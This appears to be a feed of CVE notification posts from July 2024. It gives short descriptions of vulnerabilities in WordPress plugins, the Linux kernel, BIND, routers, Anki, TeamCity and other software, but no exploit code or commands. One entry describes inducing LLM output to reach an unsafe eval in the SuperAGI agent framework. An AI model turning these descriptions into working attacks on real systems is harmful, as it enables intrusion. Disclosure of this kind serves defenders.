🚨 CVE-2017-17058The WooCommerce plugin through 3.x for WordPress has a Directory Traversal Vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory. NOTE: a software maintainer indicates that Directory Traversal is not possible because all of the template files have "if (!defined('ABSPATH')) {exit;}" code🎖@cveNotify |
|
| 2024-07-23 19:37:25 |
🚨 CVE-2017-8912CMS Made Simple (CMSMS) 2.1.6 allows remote authenticated administrators to execute arbitrary PHP code via the code parameter to admin/editusertag.php, related to the CreateTagFunction and CallUserTag functions. NOTE: the vendor reportedly has stated this is "a feature, not a bug.🎖@cveNotify |
|
| 2024-07-23 19:37:24 |
🚨 CVE-2017-7306Riverbed RiOS through 9.6.0 has a weak default password for the secure vault, which makes it easier for physically proximate attackers to defeat the secure-vault protection mechanism by leveraging knowledge of the password algorithm and the appliance serial number. NOTE: the vendor believes that this does not meet the definition of a vulnerability. The product contains correct computational logic for supporting arbitrary password changes by customers; however, a password change is optional to meet different customers' needs🎖@cveNotify |
|
| 2024-07-23 19:07:25 |
🚨 CVE-2024-24704Missing Authorization vulnerability in AddonMaster Load More Anything.This issue affects Load More Anything: from n/a through 3.3.3.🎖@cveNotify |
|
| 2024-07-23 19:07:24 |
🚨 CVE-2017-14955Check_MK before 1.2.8p26 mishandles certain errors within the failed-login save feature because of a race condition, which allows remote attackers to obtain sensitive user information by reading a GUI crash report.🎖@cveNotify |
|
| 2024-07-23 18:37:31 |
🚨 CVE-2020-11640AdvaBuild uses a command queue to launch certain operations. An attacker who gains access to thecommand queue can use it to launch an attack by running any executable on the AdvaBuild node. Theexecutables that can be run are not limited to AdvaBuild specific executables. Improper Privilege Management vulnerability in ABB Advant MOD 300 AdvaBuild.This issue affects Advant MOD 300 AdvaBuild: from 3.0 through 3.7 SP2.🎖@cveNotify |
|
| 2024-07-23 18:37:30 |
🚨 CVE-2024-35716Missing Authorization vulnerability in Copymatic Copymatic – AI Content Writer & Generator.This issue affects Copymatic – AI Content Writer & Generator: from n/a through 1.9.🎖@cveNotify |
|
| 2024-07-23 18:37:26 |
🚨 CVE-2024-35692Missing Authorization vulnerability in Termly Cookie Consent.This issue affects Cookie Consent: from n/a through 3.2.🎖@cveNotify |
|
| 2024-07-23 18:37:25 |
🚨 CVE-2020-13998Citrix XenApp 6.5, when 2FA is enabled, allows a remote unauthenticated attacker to ascertain whether a user exists on the server, because the 2FA error page only occurs after a valid username is entered. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-07-23 18:37:24 |
🚨 CVE-2016-7919Moodle 3.1.2 allows remote attackers to obtain sensitive information via unspecified vectors, related to a "SQL Injection" issue affecting the Administration panel function in the installation process component. NOTE: the vendor disputes the relevance of this report, noting that "the person who is installing Moodle must know database access credentials and they can access the database directly; there is no need for them to create a SQL injection in one of the installation dialogue fields.🎖@cveNotify |
|
| 2024-07-23 18:07:25 |
🚨 CVE-2024-4898The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary option updates due to a missing authorization checks on the REST API calls in all versions up to, and including, 0.1.0.38. This makes it possible for unauthenticated attackers to connect the site to InstaWP API, edit arbitrary site options and create administrator accounts.🎖@cveNotify |
|
| 2024-07-23 18:07:24 |
🚨 CVE-2024-5663The Cards for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Cards widget in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-23 17:37:32 |
🚨 CVE-2024-41664Canarytokens help track activity and actions on a network. Prior to `sha-8ea5315`, Canarytokens.org was vulnerable to a blind SSRF in the Webhook alert feature. When a Canarytoken is created, users choose to receive alerts either via email or via a webhook. If a webhook is supplied when a Canarytoken is first created, the site will make a test request to the supplied URL to ensure it accepts alert notification HTTP requests. No safety checks were performed on the URL, leading to a Server-Side Request Forgery vulnerability. The SSRF is Blind because the content of the response is not displayed to the creating user; they are simply told whether an error occurred in making the test request. Using the Blind SSRF, it was possible to map out open ports for IPs inside the Canarytokens.org infrastructure. This issue is now patched on Canarytokens.org. Users of self-hosted Canarytokens installations can update by pulling the latest Docker image, or any Docker image after `sha-097d91a`.🎖@cveNotify |
|
| 2024-07-23 17:37:26 |
🚨 CVE-2024-41178Exposure of temporary credentials in logs in Apache Arrow Rust Object Store (`object_store` crate), version 0.10.1 and earlier on all platforms using AWS WebIdentityTokens. On certain error conditions, the logs may contain the OIDC token passed to AssumeRoleWithWebIdentity https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html . This allows someone with access to the logs to impersonate that identity, including performing their own calls to AssumeRoleWithWebIdentity, until the OIDC token expires. Typically OIDC tokens are valid for up to an hour, although this will vary depending on the issuer.Users are recommended to use a different AWS authentication mechanism, disable logging or upgrade to version 0.10.2, which fixes this issue.Details:When using AWS WebIdentityTokens with the object_store crate, in the event of a failure and automatic retry, the underlying reqwest error, including the full URL with the credentials, potentially in the parameters, is written to the logs. Thanks to Paul Hatcherian for reporting this vulnerability🎖@cveNotify |
|
| 2024-07-23 17:37:25 |
🚨 CVE-2024-4845The Icegram Express plugin for WordPress is vulnerable to SQL Injection via the ‘options[list_id]’ parameter in all versions up to, and including, 5.7.22 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-07-23 17:37:24 |
🚨 CVE-2024-2092The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Twitter Widget in all versions up to, and including, 1.13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-23 16:37:35 |
🚨 CVE-2024-41663Canarytokens help track activity and actions on a network. A Cross-Site Scripting vulnerability was identified in the "Cloned Website" Canarytoken, whereby the Canarytoken's creator can attack themselves. The creator of a slow-redirect Canarytoken can insert Javascript into the destination URL of their slow redirect token. When the creator later browses the management page for their own Canarytoken, the Javascript executes. This is a self-XSS. An attacker could create a Canarytoken with this self-XSS, and send the management link to a victim. When they click on it, the Javascript would execute. However, no sensitive information (ex. session information) will be disclosed to the malicious actor. This issue is now patched on Canarytokens.org. Users of self-hosted Canarytokens installations can update by pulling the latest Docker image, or any Docker image after `sha-097d91a`.🎖@cveNotify |
|
| 2024-07-23 16:37:31 |
🚨 CVE-2024-1975If a server hosts a zone containing a "KEY" Resource Record, or a resolver DNSSEC-validates a "KEY" Resource Record from a DNSSEC-signed domain in cache, a client can exhaust resolver CPU resources by sending a stream of SIG(0) signed requests.This issue affects BIND 9 versions 9.0.0 through 9.11.37, 9.16.0 through 9.16.50, 9.18.0 through 9.18.27, 9.19.0 through 9.19.24, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.49-S1, and 9.18.11-S1 through 9.18.27-S1.🎖@cveNotify |
|
| 2024-07-23 16:37:30 |
🚨 CVE-2024-0760A malicious client can send many DNS messages over TCP, potentially causing the server to become unstable while the attack is in progress. The server may recover after the attack ceases. Use of ACLs will not mitigate the attack. This issue affects BIND 9 versions 9.18.1 through 9.18.27, 9.19.0 through 9.19.24, and 9.18.11-S1 through 9.18.27-S1.🎖@cveNotify |
|
| 2024-07-23 16:37:26 |
🚨 CVE-2024-41317TOTOLINK A6000R V1.0.1-B20201211.2000 was discovered to contain a command injection vulnerability via the ifname parameter in the apcli_do_enr_pbc_wps function.🎖@cveNotify |
|
| 2024-07-23 16:37:25 |
🚨 CVE-2024-41314TOTOLINK A6000R V1.0.1-B20201211.2000 was discovered to contain a command injection vulnerability via the iface parameter in the vif_disable function.🎖@cveNotify |
|
| 2024-07-23 16:37:24 |
🚨 CVE-2024-4467A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.🎖@cveNotify |
|
| 2024-07-23 16:07:24 |
🚨 CVE-2022-48852In the Linux kernel, the following vulnerability has been resolved:drm/vc4: hdmi: Unregister codec device on unbindOn bind we will register the HDMI codec device but we don't unregisterit on unbind, leading to a device leakage. Unregister our device atunbind.🎖@cveNotify |
|
| 2024-07-23 15:37:30 |
🚨 CVE-2022-48856In the Linux kernel, the following vulnerability has been resolved:gianfar: ethtool: Fix refcount leak in gfar_get_ts_infoThe of_find_compatible_node() function returns a node pointer withrefcount incremented, We should use of_node_put() on it when doneAdd the missing of_node_put() to release the refcount.🎖@cveNotify |
|
| 2024-07-23 15:37:26 |
🚨 CVE-2022-48854In the Linux kernel, the following vulnerability has been resolved:net: arc_emac: Fix use after free in arc_mdio_probe()If bus->state is equal to MDIOBUS_ALLOCATED, mdiobus_free(bus) will freethe "bus". But bus->name is still used in the next line, which will leadto a use after free.We can fix it by putting the name in a local variable and make thebus->name point to the rodata section "name",then use the name in theerror message without referring to bus to avoid the uaf.🎖@cveNotify |
|
| 2024-07-23 15:37:25 |
🚨 CVE-2024-4467A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.🎖@cveNotify |
|
| 2024-07-23 15:37:24 |
🚨 CVE-2023-29581yasm 1.3.0.55.g101bc has a segmentation violation in the function delete_Token at modules/preprocs/nasm/nasm-pp.c. NOTE: although a libyasm application could become unavailable if this were exploited, the vendor's position is that there is no security relevance because there is either supposed to be input validation before data reaches libyasm, or a sandbox in which the application runs.🎖@cveNotify |
|
| 2024-07-23 15:07:25 |
🚨 CVE-2022-48860In the Linux kernel, the following vulnerability has been resolved:ethernet: Fix error handling in xemaclite_of_probeThis node pointer is returned by of_parse_phandle() with refcountincremented in this function. Calling of_node_put() to avoid therefcount leak. As the remove function do.🎖@cveNotify |
|
| 2024-07-23 15:07:24 |
🚨 CVE-2022-48859In the Linux kernel, the following vulnerability has been resolved:net: marvell: prestera: Add missing of_node_put() in prestera_switch_set_base_mac_addrThis node pointer is returned by of_find_compatible_node() withrefcount incremented. Calling of_node_put() to aovid the refcount leak.🎖@cveNotify |
|
| 2024-07-23 14:37:26 |
🚨 CVE-2024-5602A stack-based buffer overflow vulnerability due to a missing bounds check in the NI I/O Trace Tool may result in arbitrary code execution. Successful exploitation requires an attacker to provide a user with a specially crafted nitrace file.The NI I/O Trace tool is installed as part of the NI System Configuration utilities included with many NI software products. Refer to the NI Security Advisory for identifying the version of NI IO Trace.exe installed. The NI I/O Trace tool was also previously released as NI Spy.🎖@cveNotify |
|
| 2024-07-23 14:37:25 |
🚨 CVE-2024-4079An out of bounds read due to a missing bounds check in LabVIEW may disclose information or result in arbitrary code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q1 and prior versions.🎖@cveNotify |
|
| 2024-07-23 14:37:24 |
🚨 CVE-2022-48866In the Linux kernel, the following vulnerability has been resolved:HID: hid-thrustmaster: fix OOB read in thrustmaster_interruptsSyzbot reported an slab-out-of-bounds Read in thrustmaster_probe() bug.The root case is in missing validation check of actual number of endpoints.Code should not blindly access usb_host_interface::endpoint array, sinceit may contain less endpoints than code expects.Fix it by adding missing validaion check and print an error ifnumber of endpoints do not match expected number🎖@cveNotify |
|
| 2024-07-23 12:37:25 |
🚨 CVE-2024-41836InDesign Desktop versions ID18.5.2, ID19.3 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to an application denial-of-service (DoS). An attacker could exploit this vulnerability to crash the application, resulting in a denial of service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-07-23 12:37:24 |
🚨 CVE-2024-34128Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-07-23 10:37:24 |
🚨 CVE-2024-7014EvilVideo vulnerability allows sending malicious apps disguised as videos in Telegram for Android application affecting versions 10.14.4 and older.🎖@cveNotify |
|
| 2024-07-23 09:37:24 |
🚨 CVE-2024-3596RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by a local attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature.🎖@cveNotify |
|
| 2024-07-23 08:37:24 |
🚨 CVE-2024-41012In the Linux kernel, the following vulnerability has been resolved:filelock: Remove locks reliably when fcntl/close race is detectedWhen fcntl_setlk() races with close(), it removes the created lock withdo_lock_file_wait().However, LSMs can allow the first do_lock_file_wait() that created the lockwhile denying the second do_lock_file_wait() that tries to remove the lock.Separately, posix_lock_file() could also fail toremove a lock due to GFP_KERNEL allocation failure (when splitting a rangein the middle).After the bug has been triggered, use-after-free reads will occur inlock_get_status() when userspace reads /proc/locks. This can likely be usedto read arbitrary kernel memory, but can't corrupt kernel memory.Fix it by calling locks_remove_posix() instead, which is designed toreliably get rid of POSIX locks associated with the given file andfiles_struct and is also used by filp_flush().🎖@cveNotify |
|
| 2024-07-23 06:37:25 |
🚨 CVE-2024-6420The Hide My WP Ghost WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.🎖@cveNotify |
|
| 2024-07-23 06:37:24 |
🚨 CVE-2024-4260The Page Builder Gutenberg Blocks WordPress plugin before 3.1.12 does not prevent users from pinging arbitrary hosts via some of its shortcodes, which could allow high privilege users such as contributors to perform SSRF attacks.🎖@cveNotify |
|
| 2024-07-23 03:37:25 |
🚨 CVE-2024-6913Execution with unnecessary privileges in PerkinElmer ProcessPlus allows an attacker to spawn a remote shell on the windows system.This issue affects ProcessPlus: through 1.11.6507.0.🎖@cveNotify |
|
| 2024-07-23 03:37:24 |
🚨 CVE-2024-6911Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue affects ProcessPlus: through 1.11.6507.0.🎖@cveNotify |
|
| 2024-07-23 02:37:25 |
🚨 CVE-2024-6828The Redux Framework plugin for WordPress is vulnerable to unauthenticated JSON file uploads due to missing authorization and capability checks on the Redux_Color_Scheme_Import function in versions 4.4.12 to 4.4.17. This makes it possible for unauthenticated attackers to upload JSON files, which can be used to conduct stored cross-site scripting attacks and, in some rare cases, when the wp_filesystem fails to initialize - to Remote Code Execution.🎖@cveNotify |
|
| 2024-07-23 02:37:24 |
🚨 CVE-2024-1575The improper privilege management vulnerability in the Zyxel WBE660S firmware version 6.70(ACGG.3) and earlier versions could allow an authenticated user to escalate privileges and download the configuration files on a vulnerable device.🎖@cveNotify |
|
| 2024-07-23 01:37:25 |
🚨 CVE-2024-6717HashiCorp Nomad and Nomad Enterprise 1.6.12 up to 1.7.9, and 1.8.1 archive unpacking during migration is vulnerable to path escaping of the allocation directory. This vulnerability, CVE-2024-6717, is fixed in Nomad 1.6.13, 1.7.10, and 1.8.2.🎖@cveNotify |
|
| 2024-07-23 01:37:24 |
🚨 CVE-2024-3904Incorrect Default Permissions vulnerability in Smart Device Communication Gateway preinstalled on MELIPC Series MI5122-VW firmware versions "05" to "07" allows a local attacker to execute arbitrary code by saving a malicious file to a specific folder. As a result, the attacker may disclose, tamper with, destroy or delete information in the product, or cause a denial-of-service (DoS) condition on the product.🎖@cveNotify |
|
| 2024-07-22 22:37:24 |
🚨 CVE-2024-24507Cross Site Scripting vulnerability in Act-On 2023 allows a remote attacker to execute arbitrary code via the newUser parameter in the login.jsp component.🎖@cveNotify |
|
| 2024-07-22 21:37:32 |
🚨 CVE-2024-6806The NI VeriStand Gateway is missing authorization checks when an actor attempts to access Project resources. These missing checks may result in remote code execution. This affects NI VeriStand 2024 Q2 and prior versions.🎖@cveNotify |
|
| 2024-07-22 21:37:26 |
🚨 CVE-2024-6805The NI VeriStand Gateway is missing authorization checks when an actor attempts to access File Transfer resources. These missing checks may result in information disclosure or remote code execution. This affects NI VeriStand 2024 Q2 and prior versions.🎖@cveNotify |
|
| 2024-07-22 21:37:25 |
🚨 CVE-2024-6791A directory path traversal vulnerability exists when loading a vsmodel file in NI VeriStand that may result in remote code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .vsmodel file. This vulnerability affects VeriStand 2024 Q2 and prior versions.🎖@cveNotify |
|
| 2024-07-22 21:37:24 |
🚨 CVE-2024-40502SQL injection vulnerability in Hospital Management System Project in ASP.Net MVC 1 allows aremote attacker to execute arbitrary code via the btn_login_b_Click function of the Loginpage.aspx🎖@cveNotify |
|
| 2024-07-22 21:07:24 |
🚨 CVE-2024-5674The Newsletter - API v1 and v2 addon plugin for WordPress is vulnerable to unauthorized subscribers management due to PHP type juggling issue on the check_api_key function in all versions up to, and including, 2.4.5. This makes it possible for unauthenticated attackers to list, create or delete newsletter subscribers. This issue affects only sites running the PHP version below 8.0🎖@cveNotify |
|
| 2024-07-22 20:37:32 |
🚨 CVE-2024-39250EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.🎖@cveNotify |
|
| 2024-07-22 20:37:25 |
🚨 CVE-2024-22855A cross-site scripting (XSS) vulnerability in the User Maintenance section of ITSS iMLog v1.307 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Last Name parameter.🎖@cveNotify |
|
| 2024-07-22 20:37:24 |
🚨 CVE-2022-47578An issue was discovered in the endpoint protection agent in Zoho ManageEngine Device Control Plus 10.1.2228.15. Despite configuring complete restrictions on USB pendrives, USB HDD devices, memory cards, USB connections to mobile devices, etc., it is still possible to bypass the USB restrictions by booting into Safe Mode. This allows a file to be exchanged outside the laptop/system. Safe Mode can be launched by any user (even without admin rights). Data exfiltration can occur, and also malware might be introduced onto the system. NOTE: the vendor's position is "it's not a vulnerability in our product."🎖@cveNotify |
|
| 2024-07-22 20:07:25 |
🚨 CVE-2024-40039idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/userGroup_deal.php?mudi=del🎖@cveNotify |
|
| 2024-07-22 20:07:24 |
🚨 CVE-2024-40037idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/userScore_deal.php?mudi=del🎖@cveNotify |
|
| 2024-07-22 19:37:32 |
🚨 CVE-2024-41880In veilid-core in Veilid before 0.3.4, the protocol's ping function can be misused in a way that decreases the effectiveness of safety and private routes.🎖@cveNotify |
|
| 2024-07-22 19:37:26 |
🚨 CVE-2024-40075Laravel v11.x was discovered to contain an XML External Entity (XXE) vulnerability.🎖@cveNotify |
|
| 2024-07-22 19:37:25 |
🚨 CVE-2024-30534Missing Authorization vulnerability in typps Calendarista Basic Edition.This issue affects Calendarista Basic Edition: from n/a through 3.0.5.🎖@cveNotify |
|
| 2024-07-22 19:37:24 |
🚨 CVE-2023-52232Missing Authorization vulnerability in Pluggabl LLC Booster Plus for WooCommerce.This issue affects Booster Plus for WooCommerce: from n/a before 7.1.2.🎖@cveNotify |
|
| 2024-07-22 19:07:26 |
🚨 CVE-2024-30539Missing Authorization vulnerability in Awesome Support Team Awesome Support.This issue affects Awesome Support: from n/a through 6.1.7.🎖@cveNotify |
|
| 2024-07-22 19:07:25 |
🚨 CVE-2024-30537Missing Authorization vulnerability in WPClever WPC Badge Management for WooCommerce.This issue affects WPC Badge Management for WooCommerce: from n/a through 2.4.0.🎖@cveNotify |
|
| 2024-07-22 19:07:24 |
🚨 CVE-2023-52230Missing Authorization vulnerability in Pluggabl LLC Booster Plus for WooCommerce.This issue affects Booster Plus for WooCommerce: from n/a before 7.1.3.🎖@cveNotify |
|
| 2024-07-22 18:37:33 |
🚨 CVE-2024-2762The FooGallery WordPress plugin before 2.4.15, foogallery-premium WordPress plugin before 2.4.15 does not validate and escape some of its Gallery settings before outputting them back in the page, which could allow users with a role as low as Author to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-22 18:37:26 |
🚨 CVE-2024-33602nscd: netgroup cache assumes NSS callback uses in-buffer stringsThe Name Service Cache Daemon's (nscd) netgroup cache can corrupt memorywhen the NSS callback does not store all strings in the provided buffer.The flaw was introduced in glibc 2.15 when the cache was added to nscd.This vulnerability is only present in the nscd binary.🎖@cveNotify |
|
| 2024-07-22 18:37:25 |
🚨 CVE-2024-33599nscd: Stack-based buffer overflow in netgroup cacheIf the Name Service Cache Daemon's (nscd) fixed size cache is exhaustedby client requests then a subsequent client request for netgroup datamay result in a stack-based buffer overflow. This flaw was introducedin glibc 2.15 when the cache was added to nscd.This vulnerability is only present in the nscd binary.🎖@cveNotify |
|
| 2024-07-22 18:37:24 |
🚨 CVE-2024-2961The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.🎖@cveNotify |
|
| 2024-07-22 17:37:30 |
🚨 CVE-2024-32484An reflected XSS vulnerability exists in the handling of invalid paths in the Flask server in Ankitects Anki 24.04. A specially crafted flashcard can lead to JavaScript code execution and result in an arbitrary file read. An attacker can share a malicious flashcard to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-22 17:37:26 |
🚨 CVE-2024-29073An vulnerability in the handling of Latex exists in Ankitects Anki 24.04. When Latex is sanitized to prevent unsafe commands, the verbatim package, which comes installed by default in many Latex distributions, has been overlooked. A specially crafted flashcard can lead to an arbitrary file read. An attacker can share a flashcard to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-22 17:37:25 |
🚨 CVE-2024-36416SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a deprecated v4 API example with no log rotation allows denial of service by logging excessive data. Versions 7.14.4 and 8.6.1 contain a fix for this issue.🎖@cveNotify |
|
| 2024-07-22 17:37:24 |
🚨 CVE-2021-33627An issue was discovered in Insyde InsydeH2O Kernel 5.0 before 05.09.11, 5.1 before 05.17.11, 5.2 before 05.27.11, 5.3 before 05.36.11, 5.4 before 05.44.11, and 5.5 before 05.52.11 affecting FwBlockServiceSmm. Software SMI services that use the Communicate() function of the EFI_SMM_COMMUNICATION_PROTOCOL do not check whether the address of the buffer is valid, which allows use of SMRAM, MMIO, or OS kernel addresses.🎖@cveNotify |
|
| 2024-07-22 15:37:36 |
🚨 CVE-2024-41828In JetBrains TeamCity before 2024.07 comparison of authorization tokens took non-constant time🎖@cveNotify |
|
| 2024-07-22 15:37:35 |
🚨 CVE-2024-41826In JetBrains TeamCity before 2024.07 stored XSS was possible on Show Connection page🎖@cveNotify |
|
| 2024-07-22 15:37:31 |
🚨 CVE-2024-41824In JetBrains TeamCity before 2024.07 parameters of the "password" type could leak into the build log in some specific cases🎖@cveNotify |
|
| 2024-07-22 15:37:30 |
🚨 CVE-2024-41129The ops library is a Python framework for developing and testing Kubernetes and machine charms. The issue here is that ops passes the secret content as one of the args via CLI. This issue may affect any of the charms that are using: Juju (>=3.0), Juju secrets and not correctly capturing and processing `subprocess.CalledProcessError`. This vulnerability is fixed in 2.15.0.🎖@cveNotify |
|
| 2024-07-22 15:37:26 |
🚨 CVE-2024-32484An reflected XSS vulnerability exists in the handling of invalid paths in the Flask server in Ankitects Anki 24.04. A specially crafted flashcard can lead to JavaScript code execution and result in an arbitrary file read. An attacker can share a malicious flashcard to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-22 15:37:25 |
🚨 CVE-2024-26020An arbitrary script execution vulnerability exists in the MPV functionality of Ankitects Anki 24.04. A specially crafted flashcard can lead to a arbitrary code execution. An attacker can send malicious flashcard to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-22 15:37:24 |
🚨 CVE-2024-21552All versions of `SuperAGI` are vulnerable to Arbitrary Code Execution due to unsafe use of the ‘eval’ function. An attacker could induce the LLM output to exploit this vulnerability and gain arbitrary code execution on the SuperAGI application server.🎖@cveNotify |
|
| 2024-07-22 15:07:24 |
🚨 CVE-2024-36991In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.🎖@cveNotify |
|
| 2024-07-22 14:37:30 |
🚨 CVE-2024-25638dnsjava is an implementation of DNS in Java. Records in DNS replies are not checked for their relevance to the query, allowing an attacker to respond with RRs from different zones. This vulnerability is fixed in 3.6.0.🎖@cveNotify |
|
| 2024-07-22 14:37:26 |
🚨 CVE-2024-38788Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Bởi Admin 2020 UiPress lite allows SQL Injection.This issue affects UiPress lite: from n/a through 3.4.06.🎖@cveNotify |
|
| 2024-07-22 14:37:25 |
🚨 CVE-2024-23321For RocketMQ versions 5.2.0 and below, under certain conditions, there is a risk of exposure of sensitive Information to an unauthorized actor even if RocketMQ is enabled with authentication and authorization functions.An attacker, possessing regular user privileges or listed in the IP whitelist, could potentially acquire the administrator's account and password through specific interfaces. Such an action would grant them full control over RocketMQ, provided they have access to the broker IP address list.To mitigate these security threats, it is strongly advised that users upgrade to version 5.3.0 or newer. Additionally, we recommend users to use RocketMQ ACL 2.0 instead of the original RocketMQ ACL when upgrading to version Apache RocketMQ 5.3.0.🎖@cveNotify |
|
| 2024-07-22 14:37:24 |
🚨 CVE-2024-35730Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in realmag777 Active Products Tables for WooCommerce allows Reflected XSS.This issue affects Active Products Tables for WooCommerce: from n/a through 1.0.6.3.🎖@cveNotify |
|
| 2024-07-22 13:37:24 |
🚨 CVE-2023-47610A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists in Telit Cinterion EHS5/6/8 that could allow a remote unauthenticated attacker to execute arbitrary code on the targeted system by sending a specially crafted SMS message.🎖@cveNotify |
|
| 2024-07-22 13:07:43 |
🚨 CVE-2024-39123In janeczku Calibre-Web 0.6.0 to 0.6.21, the edit_book_comments function is vulnerable to Cross Site Scripting (XSS) due to improper sanitization performed by the clean_string function. The vulnerability arises from the way the clean_string function handles HTML sanitization.🎖@cveNotify |
|
| 2024-07-22 13:07:37 |
🚨 CVE-2024-40400An arbitrary file upload vulnerability in the image upload function of Automad v2.0.0 allows attackers to execute arbitrary code via a crafted file.🎖@cveNotify |
|
| 2024-07-22 13:07:36 |
🚨 CVE-2024-41602Cross Site Request Forgery vulnerability in Spina CMS v.2.18.0 and before allows a remote attacker to escalate privileges via a crafted URL🎖@cveNotify |
|
| 2024-07-22 13:07:35 |
🚨 CVE-2024-41601Insecure Permissions vulnerability in lin-CMS v.0.2.0 and before allows a remote attacker to obtain sensitive information via the login method in the UserController.java component.🎖@cveNotify |
|
| 2024-07-22 13:07:32 |
🚨 CVE-2024-41492A stack overflow in Tenda AX1806 v1.0.0.1 allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2024-07-22 13:07:31 |
🚨 CVE-2024-24970Potential vulnerabilities have been identified in the HP Display Control software component within the HP Application Enabling Software Driver which might allow escalation of privilege.🎖@cveNotify |
|
| 2024-07-22 13:07:30 |
🚨 CVE-2024-6908Improper privilege management in Yugabyte Platform allows authenticated admin users to escalate privileges to SuperAdmin via a crafted PUT HTTP request, potentially leading to unauthorized access to sensitive system functions and data.🎖@cveNotify |
|
| 2024-07-22 13:07:26 |
🚨 CVE-2024-39962D-Link DIR-823X AX3000 Dual-Band Gigabit Wireless Router v21_D240126 was discovered to contain a remote code execution (RCE) vulnerability in the ntp_zone_val parameter at /goform/set_ntp. This vulnerability is exploited via a crafted HTTP request.🎖@cveNotify |
|
| 2024-07-22 13:07:25 |
🚨 CVE-2024-0006Information exposure in the logging system in Yugabyte Platform allows local attackers with access to application logs to obtain database user credentials in log files, potentially leading to unauthorized database access.🎖@cveNotify |
|
| 2024-07-22 11:37:32 |
🚨 CVE-2024-38723Server-Side Request Forgery (SSRF) vulnerability in Bernhard Kux JSON Content Importer.This issue affects JSON Content Importer: from n/a through 1.5.6.🎖@cveNotify |
|
| 2024-07-22 11:37:26 |
🚨 CVE-2024-38708Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in UkrSolution Barcode Scanner with Inventory & Order Manager allows SQL Injection.This issue affects Barcode Scanner with Inventory & Order Manager: from n/a through 1.6.1.🎖@cveNotify |
|
| 2024-07-22 11:37:25 |
🚨 CVE-2024-37942Server-Side Request Forgery (SSRF) vulnerability in Berqier Ltd BerqWP.This issue affects BerqWP: from n/a through 1.7.5.🎖@cveNotify |
|
| 2024-07-22 11:37:24 |
🚨 CVE-2024-37224Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in smartypants SP Project & Document Manager.This issue affects SP Project & Document Manager: from n/a through 4.71.🎖@cveNotify |
|
| 2024-07-22 10:37:43 |
🚨 CVE-2024-37211Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Ali2Woo Team Ali2Woo Lite allows Reflected XSS.This issue affects Ali2Woo Lite: from n/a through 3.3.5.🎖@cveNotify |
|
| 2024-07-22 10:37:36 |
🚨 CVE-2024-37122Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Biplob Adhikari Accordions allows Stored XSS.This issue affects Accordions: from n/a through 2.3.5.🎖@cveNotify |
|
| 2024-07-22 10:37:35 |
